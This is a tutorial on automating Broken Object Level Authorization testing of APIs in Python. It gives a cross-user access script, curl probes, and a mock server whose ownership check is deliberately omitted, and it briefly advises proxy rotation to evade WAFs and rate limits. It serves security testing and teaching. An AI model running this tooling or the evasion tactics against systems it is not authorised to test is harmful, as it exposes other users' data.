Automating Broken Object Level Authorization (BOLA) Testing in APIs with Python
Broken Object Level Authorization (BOLA), also known as Insecure Direct Object References (IDOR), remains the number one API security risk according to the OWASP API Security Top 10 2023. This critical vulnerability allows authenticated users to bypass authorization and access resources they are not permitted to, typically by manipulating object identifiers in API requests. Automating the detection of BOLA is essential for any serious API security testing regimen, shifting from reactive incident response to proactive vulnerability management. This article details a practical approach to building a Python-based automation script to identify these flaws.
Understanding BOLA: The Core Problem
BOLA vulnerabilities stem from an API's failure to verify that a requesting user is authorized to access a specific data object, even when the user is authenticated. Consider an API endpoint like `/api/v1/users/{user_id}/profile` or `/api/v1/documents/{document_id}`. If the backend merely retrieves the resource based on the provided `user_id` or `document_id` without checking whether the currently authenticated user has explicit permission to access *that particular* ID, a BOLA vulnerability exists. Attackers can then enumerate or guess object IDs to access or modify sensitive data belonging to other users. The issue is compounded when APIs use predictable, sequential identifiers (e.g., `101`, `102`, `103`) rather than universally unique identifiers (UUIDs), because enumeration becomes trivial. Unpredictable IDs only raise the cost of guessing, though; they do not replace a per-object authorization check. A successful BOLA exploit can lead to unauthorized data exposure, modification, or even deletion.
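To make the missing check concrete, here is a minimal sketch of the same lookup written with and without an ownership test. The `DOCUMENTS` store and both function names are hypothetical and exist only for illustration; a real backend would query a database and take the user from its authentication layer.

```python
# Hypothetical in-memory store; a real API would query a database instead.
DOCUMENTS = {
    "doc-123": {"owner_id": "user-a", "content": "Alice's notes"},
    "doc-789": {"owner_id": "user-b", "content": "Bob's notes"},
}


def get_document_vulnerable(current_user_id, document_id):
    """Look the object up by ID only: any authenticated caller succeeds."""
    document = DOCUMENTS.get(document_id)
    if document is None:
        return 404, None
    return 200, document


def get_document_secure(current_user_id, document_id):
    """Same lookup, followed by an object-level ownership check."""
    document = DOCUMENTS.get(document_id)
    if document is None:
        return 404, None
    if document["owner_id"] != current_user_id:
        return 403, None
    return 200, document


# user-b asks for a document owned by user-a.
print(get_document_vulnerable("user-b", "doc-123")[0])
print(get_document_secure("user-b", "doc-123")[0])
```

The only difference between the two functions is the comparison of `owner_id` with the caller, which is exactly the step a BOLA-vulnerable endpoint omits.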
Manual Reconnaissance and Proof-of-Concept
Before automating, understanding the manual exploitation flow provides a clear target for our scripts. A pentester would typically follow these steps:
- Identify an API endpoint that references an object ID in the URL path, query parameters, or request body. For example, `GET /api/v1/documents/doc-456`.
- Authenticate as `User A` and make a legitimate request to retrieve an object they own. Note the object's ID, e.g., `doc-123`, and the successful response.
- Authenticate as `User B` (who should *not* have access to `doc-123`) and attempt to access `doc-123` by replaying the request from the previous step with `User B`'s credentials.
- Analyze the response. If `User B` receives a `200 OK` status code along with `User A`'s sensitive data instead of a `403 Forbidden` or `401 Unauthorized`, a BOLA vulnerability is confirmed. A `404 Not Found` is not a BOLA by itself, since many APIs deliberately return it for unauthorized objects to hide their existence. It is an information leak only if it differs from the response returned for IDs that genuinely do not exist.
Here's a simplified `curl` example demonstrating manual probing for an authenticated `User B` trying to access `User A`'s document:
# Authenticate User B and obtain their JWT token (this is a placeholder for actual login)
# Assume USER_B_TOKEN is obtained.
# Attempt to access User A's document (ID 'doc-123') using User B's token
curl -X GET "https://api.example.com/api/v1/documents/doc-123" \
  -H "Authorization: Bearer USER_B_TOKEN"
Expected vulnerable output (200 OK with User A's data):
HTTP/1.1 200 OK
Content-Type: application/json
{
  "id": "doc-123",
  "owner_id": "user-a-id",
  "content": "Sensitive document content belonging to User A."
}
Expected secure output (403 Forbidden):
HTTP/1.1 403 Forbidden
Content-Type: application/json
{
  "error": "Forbidden",
  "message": "You do not have permission to access this resource."
}
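The two outcomes above can also be told apart in code. The following is a rough sketch, assuming the response body is a JSON object that names its owner in an `owner_id` field, as in the sample output; the function name and the `owner_field` parameter are hypothetical, and other APIs will expose ownership differently or not at all.

```python
import json


def exposes_foreign_object(status_code, body_text, requester_id, owner_field="owner_id"):
    """Return True when a 2xx response carries an object owned by someone else."""
    if not 200 <= status_code < 300:
        return False
    try:
        body = json.loads(body_text)
    except ValueError:
        # Non-JSON body: ownership cannot be judged from it.
        return False
    if not isinstance(body, dict):
        return False
    owner = body.get(owner_field)
    return owner is not None and owner != requester_id


# Bodies taken from the two sample responses above.
vulnerable_body = (
    '{"id": "doc-123", "owner_id": "user-a-id", '
    '"content": "Sensitive document content belonging to User A."}'
)
secure_body = (
    '{"error": "Forbidden", '
    '"message": "You do not have permission to access this resource."}'
)

print(exposes_foreign_object(200, vulnerable_body, "user-b-id"))
print(exposes_foreign_object(403, secure_body, "user-b-id"))
```

Checking the body as well as the status code helps with endpoints that answer `200 OK` with an empty or filtered payload when access is denied.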
Python for Automated BOLA Testing
Python's `requests` library is an industry standard for making HTTP requests and is ideal for API interaction due to its simplicity and power. Automating BOLA testing involves a structured approach:
- Authentication Management: Maintain separate authenticated sessions for different user roles (e.g., `user_a_session`, `user_b_session`) to simulate various access contexts. This typically involves handling bearer tokens or session cookies.
- Object ID Discovery: As an authorized user, query API endpoints to legitimately discover object IDs. This could involve listing resources (e.g., `GET /api/v1/documents`) or scraping IDs from legitimate responses. For sequential IDs, simple range enumeration is effective.
- Unauthorized Access Attempts: With a list of discovered object IDs, iterate through them, attempting to access each one using sessions associated with unauthorized users.
- Response Analysis: Examine the HTTP status code and response body for each attempt. A `200 OK` (or a `201 Created` on a write endpoint) that returns another user's data where a `403 Forbidden` or `401 Unauthorized` was expected signals a potential BOLA. A `404 Not Found` deserves a closer look only when it differs from the response for an ID that does not exist, because that difference reveals which objects exist.
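The response-analysis step can be sketched as a small classifier. This is one possible set of rules, not a definitive one: the verdict labels and the `missing_object_baseline` parameter are assumptions made for this example. The baseline is the status code and body recorded when requesting an ID known not to exist.

```python
def classify_attempt(status_code, body_text, missing_object_baseline=None):
    """Map one unauthorized access attempt to a coarse verdict.

    missing_object_baseline is an optional (status_code, body_text) pair
    recorded by requesting an ID that is known not to exist.
    """
    if status_code in (401, 403):
        return "denied"
    if 200 <= status_code < 300:
        return "likely_bola"
    if status_code == 404:
        if missing_object_baseline is None:
            return "inconclusive"
        if (status_code, body_text) == missing_object_baseline:
            # Same answer as for a nonexistent ID: nothing is revealed.
            return "indistinguishable_from_missing"
        return "possible_existence_leak"
    return "inconclusive"


baseline = (404, '{"error": "Not Found"}')
print(classify_attempt(200, '{"id": "doc-123"}'))
print(classify_attempt(404, '{"error": "Not Found"}', baseline))
print(classify_attempt(404, '{"error": "Access denied"}', baseline))
```

Anything labelled `likely_bola` or `possible_existence_leak` still needs manual confirmation, for example by checking that the returned data really belongs to another user.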
The BOLA Hunter Script (Python)
The following Python script provides a framework for automating BOLA detection. It simulates an API with a login endpoint and a document access endpoint.
import requests
import json
import logging
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# --- Configuration ---
API_BASE_URL = "http://localhost:8000" # Replace with your API base URL
# Credentials for different users
USERS = {
    "user_a": {"username": "alice", "password": "passwordA"},
    "user_b": {"username": "bob", "password": "passwordB"},
    "user_c": {"username": "charlie", "password": "passwordC"},
}
# Vulnerable API endpoints (modify as per target API)
ENDPOINTS = {
    "login": "/api/v1/auth/login",
    "get_my_documents": "/api/v1/documents/me",  # Endpoint for a user to get their own documents
    "get_document_by_id": "/api/v1/documents/{document_id}",  # Endpoint to access any document by ID
}
# --- Helper Functions ---
def authenticate(username, password):
    """
    Authenticates a user and returns an authenticated requests.Session object.
    Assumes a JWT bearer token is returned in the 'token' field of the JSON response.
    """
    login_url = f"{API_BASE_URL}{ENDPOINTS['login']}"
    payload = {"username": username, "password": password}
    try:
        response = requests.post(login_url, json=payload, timeout=10)
        response.raise_for_status()  # Raise an exception for HTTP errors
        token = response.json().get("token")
        if token:
            session = requests.Session()
            session.headers.update({"Authorization": f"Bearer {token}"})
            logging.info(f"Successfully authenticated {username}.")
            return session
        else:
            logging.error(f"Authentication failed for {username}: No token received.")
            return None
    except requests.exceptions.RequestException as e:
        logging.error(f"Error during authentication for {username}: {e}")
        return None
def get_user_documents(session):
    """
    Fetches documents owned by the currently authenticated user for the given session.
    Returns a list of document IDs.
    """
    documents_url = f"{API_BASE_URL}{ENDPOINTS['get_my_documents']}"
    try:
        response = session.get(documents_url, timeout=10)
        response.raise_for_status()
        documents = response.json().get("documents", [])
        document_ids = [doc.get("id") for doc in documents if doc.get("id")]
        logging.info(f"Discovered {len(document_ids)} documents for user via session.")
        return document_ids
    except requests.exceptions.RequestException as e:
        logging.error(f"Error fetching documents: {e}")
        return []
def test_bola_access(attacker_session, victim_document_id, expected_status_code=403):
    """
    Attempts to access a victim's document using an attacker's session.
    Returns True if a BOLA vulnerability is detected, False otherwise.
    """
    document_access_url = f"{API_BASE_URL}{ENDPOINTS['get_document_by_id'].format(document_id=victim_document_id)}"
    # Infer the attacker's alias by matching the session's token against the tokens
    # that run_bola_tests() stores in USERS. This is a simplified approach: passing
    # the alias explicitly, or storing it with the session, would be more robust.
    attacker_username = "unknown"
    auth_header = attacker_session.headers.get("Authorization") if attacker_session else None
    if auth_header:
        for user, details in USERS.items():
            if f"Bearer {details.get('token')}" == auth_header:
                attacker_username = user
                break
    logging.info(f"Attacker ({attacker_username}) attempting to access victim document ID: {victim_document_id}")
    try:
        response = attacker_session.get(document_access_url, timeout=10)
        if response.status_code == expected_status_code:
            logging.info(f"[{victim_document_id}] - Access DENIED (Status {response.status_code}). Correct behavior.")
            return False  # Not vulnerable for this test case
        elif response.status_code == 200:
            logging.warning("!!!! BOLA VULNERABILITY DETECTED !!!!")
            logging.warning(f"Attacker ({attacker_username}) accessed {victim_document_id} (Status {response.status_code})")
            # Log the raw body so that a non-JSON response cannot hide the finding
            logging.warning(f"Response: {response.text}")
            return True  # Vulnerable
        else:
            logging.warning(f"[{victim_document_id}] - Unexpected Status {response.status_code} for attacker ({attacker_username}). Response: {response.text}")
            return False  # Undetermined or other issue
    except requests.exceptions.RequestException as e:
        logging.error(f"Error accessing document {victim_document_id} with attacker ({attacker_username}): {e}")
        return False
# --- Main Automation Logic ---
def run_bola_tests():
    """
    Orchestrates the BOLA testing process.
    """
    authenticated_sessions = {}

    # 1. Authenticate all users
    logging.info("--- Phase 1: Authenticating Users ---")
    for user_alias, creds in USERS.items():
        session = authenticate(creds["username"], creds["password"])
        if session:
            authenticated_sessions[user_alias] = session
            # Store the token with user details for easier lookup in test_bola_access
            USERS[user_alias]["token"] = session.headers.get("Authorization").replace("Bearer ", "")
        else:
            logging.error(f"Failed to get session for {user_alias}. Skipping tests for this user.")
    if not authenticated_sessions:
        logging.critical("No users authenticated. Cannot proceed with BOLA testing.")
        return

    # 2. Discover documents owned by a "victim" user (e.g., user_a)
    logging.info("\n--- Phase 2: Discovering Victim Documents ---")
    victim_user_alias = "user_a"
    victim_session = authenticated_sessions.get(victim_user_alias)
    if not victim_session:
        logging.error(f"Victim user '{victim_user_alias}' session not found. Cannot discover documents.")
        return
    victim_document_ids = get_user_documents(victim_session)
    if not victim_document_ids:
        logging.warning(f"No documents discovered for victim user '{victim_user_alias}'. Skipping BOLA tests.")
        return
    logging.info(f"Documents owned by '{victim_user_alias}': {victim_document_ids}")

    # 3. Attempt unauthorized access from other users
    logging.info("\n--- Phase 3: Performing Unauthorized Access Attempts ---")
    vulnerable_endpoints_found = []
    for attacker_alias, attacker_session in authenticated_sessions.items():
        if attacker_alias == victim_user_alias:
            continue  # Skip self-testing for BOLA
        logging.info(f"\nTesting from perspective of attacker: {attacker_alias}")
        for doc_id in victim_document_ids:
            if test_bola_access(attacker_session, doc_id):
                vulnerable_endpoints_found.append(f"Document ID: {doc_id} accessed by {attacker_alias}")

    if vulnerable_endpoints_found:
        logging.critical("\n--- BOLA TEST RESULTS: VULNERABILITIES FOUND! ---")
        for vuln in vulnerable_endpoints_found:
            logging.critical(f"- {vuln}")
    else:
        logging.info("\n--- BOLA TEST RESULTS: No BOLA vulnerabilities detected. ---")
# --- Simulate an API Server (for local testing) ---
# This is a barebones simulation and would be replaced by a real API endpoint
# For a real API, remove this section and ensure API_BASE_URL points to your target.
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading
import time
import re
MOCKED_DB = {
    "users": {
        "alice": {"id": "user-a-id", "password": "passwordA", "documents": ["doc-123", "doc-456"]},
        "bob": {"id": "user-b-id", "password": "passwordB", "documents": ["doc-789"]},
        "charlie": {"id": "user-c-id", "password": "passwordC", "documents": ["doc-101"]},
    },
    "documents": {
        "doc-123": {"id": "doc-123", "owner_id": "user-a-id", "content": "Alice's Secret Project Plan"},
        "doc-456": {"id": "doc-456", "owner_id": "user-a-id", "content": "Alice's Vacation Photos"},
        "doc-789": {"id": "doc-789", "owner_id": "user-b-id", "content": "Bob's Personal Notes"},
        "doc-101": {"id": "doc-101", "owner_id": "user-c-id", "content": "Charlie's Expense Report"},
    }
}
# Simplified JWT creation for demonstration
def create_jwt(user_id):
    # In a real app, this would be a signed JWT. For the demo, it is a plain,
    # unsigned string that embeds the user ID.
    return f"mock_jwt_for_{user_id}"
class MockAPIServer(BaseHTTPRequestHandler):
    def _set_headers(self, status_code=200, content_type='application/json'):
        self.send_response(status_code)
        self.send_header('Content-type', content_type)
        self.end_headers()

    def do_POST(self):
        if self.path == ENDPOINTS['login']:
            content_length = int(self.headers['Content-Length'])
            post_data = self.rfile.read(content_length)
            credentials = json.loads(post_data.decode('utf-8'))
            username = credentials.get("username")
            password = credentials.get("password")
            user_data = MOCKED_DB["users"].get(username)
            if user_data and user_data["password"] == password:
                token = create_jwt(user_data["id"])
                self._set_headers(200)
                self.wfile.write(json.dumps({"token": token}).encode('utf-8'))
            else:
                self._set_headers(401)
                self.wfile.write(json.dumps({"error": "Invalid credentials"}).encode('utf-8'))
            return
        self._set_headers(404)
        self.wfile.write(json.dumps({"error": "Not Found"}).encode('utf-8'))

    def do_GET(self):
        auth_header = self.headers.get("Authorization")
        if not auth_header or not auth_header.startswith("Bearer "):
            self._set_headers(401)
            self.wfile.write(json.dumps({"error": "Unauthorized", "message": "Bearer token missing or invalid"}).encode('utf-8'))
            return
        # Take the part after "Bearer "; split() alone returns a list, not the token
        token = auth_header.split(" ", 1)[1]
        # In a real app, validate JWT. Here, extract user_id from mock token.
        if not token.startswith("mock_jwt_for_"):
            self._set_headers(401)
            self.wfile.write(json.dumps({"error": "Unauthorized", "message": "Invalid mock token"}).encode('utf-8'))
            return
        authenticated_user_id = token.replace("mock_jwt_for_", "", 1)
        current_username = None
        for u, data in MOCKED_DB["users"].items():
            if data["id"] == authenticated_user_id:
                current_username = u
                break
        if not current_username:
            self._set_headers(401)
            self.wfile.write(json.dumps({"error": "Unauthorized", "message": "User not found for token"}).encode('utf-8'))
            return

        # Handle get_my_documents endpoint
        if self.path == ENDPOINTS['get_my_documents']:
            user_documents = MOCKED_DB["users"].get(current_username, {}).get("documents", [])
            response_docs = [MOCKED_DB["documents"][doc_id] for doc_id in user_documents if doc_id in MOCKED_DB["documents"]]
            self._set_headers(200)
            self.wfile.write(json.dumps({"documents": response_docs}).encode('utf-8'))
            return

        # Handle get_document_by_id endpoint
        match = re.match(r'/api/v1/documents/([^/]+)', self.path)
        if match:
            requested_doc_id = match.group(1)
            document = MOCKED_DB["documents"].get(requested_doc_id)
            if document:
                # --- BOLA Vulnerability Simulation ---
                # This is where the BOLA check should be, but is intentionally omitted for demonstration
                # A secure implementation would check:
                # if document["owner_id"] != authenticated_user_id:
                #     self._set_headers(403)
                #     self.wfile.write(json.dumps({"error": "Forbidden", "message": "You do not own this document."}).encode('utf-8'))
                #     return
                # Simulating the BOLA flaw: it just returns the document if it exists,
                # without checking ownership.
                self._set_headers(200)
                self.wfile.write(json.dumps(document).encode('utf-8'))
                return
            else:
                self._set_headers(404)
                self.wfile.write(json.dumps({"error": "Not Found", "message": "Document not found."}).encode('utf-8'))
                return
        self._set_headers(404)
        self.wfile.write(json.dumps({"error": "Not Found"}).encode('utf-8'))
# Main execution block
if __name__ == "__main__":
    # Start mock API server in a separate thread
    server_address = ('', 8000)
    httpd = HTTPServer(server_address, MockAPIServer)
    server_thread = threading.Thread(target=httpd.serve_forever)
    server_thread.daemon = True  # Allow main thread to exit even if server is running
    logging.info(f"Starting mock API server on {API_BASE_URL}...")
    server_thread.start()
    time.sleep(1)  # Give server a moment to start
    # Run the BOLA tests
    run_bola_tests()
    # Stop the mock API server
    logging.info("Shutting down mock API server.")
    httpd.shutdown()
    httpd.server_close()
This script first authenticates multiple users, then, as a "victim" user (e.g., Alice), it discovers their owned documents. Subsequently, it attempts to access these discovered documents using the sessions of other "attacker" users (e.g., Bob, Charlie). A `200 OK` response indicates a successful unauthorized access, flagging a BOLA vulnerability. The mock API server is intentionally flawed to demonstrate the vulnerability. In a real-world scenario, the `API_BASE_URL` would point to your target API.
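The script treats only `user_a` as the victim. One way to widen coverage, sketched here as an assumption rather than as part of the original script, is to treat every user in turn as the victim and every other user as the attacker. The helper name `build_test_matrix` and the `discovered` mapping are hypothetical; in practice the mapping would be filled by calling `get_user_documents` once per session.

```python
from itertools import permutations


def build_test_matrix(documents_by_user):
    """Yield (attacker, victim, document_id) for every cross-user combination."""
    for attacker, victim in permutations(documents_by_user, 2):
        for document_id in documents_by_user[victim]:
            yield attacker, victim, document_id


# Hypothetical discovery results, keyed by the aliases used in USERS.
discovered = {
    "user_a": ["doc-123", "doc-456"],
    "user_b": ["doc-789"],
    "user_c": ["doc-101"],
}

for attacker, victim, document_id in build_test_matrix(discovered):
    print(f"{attacker} -> {document_id} (owned by {victim})")
```

Each yielded tuple corresponds to one call of `test_bola_access` with the attacker's session and the victim's document ID. The number of requests grows with the square of the user count, which matters once rate limits come into play.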
Real-World Considerations
Moving beyond a basic script requires addressing several practical challenges:
- Dynamic Object IDs: While the example uses simple string IDs, real APIs often employ UUIDs (Universally Unique Identifiers) or other complex, unpredictable identifiers. In such cases, direct enumeration is not feasible. The automation script would need to *discover* valid victim object IDs from legitimate user interactions (e.g., parsing responses from `GET /api/v1/my_orders` to get valid order IDs) rather than guessing them.
- Rate Limiting and WAFs: Aggressive enumeration or multiple unauthorized access attempts can trigger rate limits or Web Application Firewalls (WAFs), leading to IP blocking or CAPTCHAs. Implement delays, use proxy rotation, or distribute requests to evade detection. Tools like Burp Suite's Intruder or OWASP ZAP's Fuzzer can aid in managing these aspects, but a custom Python script offers granular control.
- Authentication Mechanisms: The script assumes Bearer token authentication. APIs might instead use OAuth 2.0 flows, API keys, basic authentication, or session cookies, so the `authenticate` function needs to be adapted to the specific API's authentication method. Python's `requests` library handles HTTP Basic and Digest authentication through its `auth` parameter and persists cookies across calls on a `Session`; other schemes usually come down to setting the right headers.
- Response Ambiguity: Status codes alone can mislead. An API that returns `404 Not Found` for non-existent objects but a different status or error message for *valid but unauthorized* objects reveals which IDs exist, even if it never returns the data. Conversely, a uniform `404` for both cases is a deliberate and acceptable way to deny access. Compare each response against a baseline for a known non-existent ID, and inspect error messages as well as status codes.
- Reporting and Integration: For large-scale testing, logging to console is insufficient. Integrate with reporting frameworks (e.g., `pytest-html` for test reports, or custom JSON/CSV output) and potentially with CI/CD pipelines to run BOLA checks automatically upon code changes.
- Scope of Object Identifiers: BOLA can manifest in path parameters (`/users/{id}`), query parameters (`/users?id=`), or within the JSON/XML request body. The script needs to be flexible enough to inject attacker-controlled IDs into all relevant locations.
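As a rough illustration of the last point, the sketch below builds three variants of a probe that carry the same object ID in the path, in the query string, and in a JSON body. The endpoint paths, the `id` and `document_id` parameter names, and the `build_probe_variants` helper are all assumptions made for this example; the real locations have to come from the target API's documentation or observed traffic.

```python
import json
from urllib.parse import quote, urlencode


def build_probe_variants(base_url, object_id):
    """Return request descriptions that carry object_id in three locations."""
    path_id = quote(object_id, safe="")       # percent-encode for use in a path segment
    query = urlencode({"id": object_id})      # hypothetical query parameter name
    body = json.dumps({"document_id": object_id})  # hypothetical body field name
    return [
        {"location": "path", "method": "GET",
         "url": f"{base_url}/api/v1/documents/{path_id}", "body": None},
        {"location": "query", "method": "GET",
         "url": f"{base_url}/api/v1/documents?{query}", "body": None},
        {"location": "body", "method": "POST",
         "url": f"{base_url}/api/v1/documents/search", "body": body},
    ]


for variant in build_probe_variants("https://api.example.com", "doc-123"):
    print(variant["location"], variant["method"], variant["url"], variant["body"])
```

Each description can then be sent with an attacker's session, for example via `session.request(variant["method"], variant["url"], data=variant["body"])` with a JSON content type for the body variant.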
Automating BOLA testing with Python empowers security teams and developers to systematically hunt for these pervasive vulnerabilities. By crafting targeted scripts, it's possible to scale detection efforts and integrate them directly into the development lifecycle, significantly improving API security posture.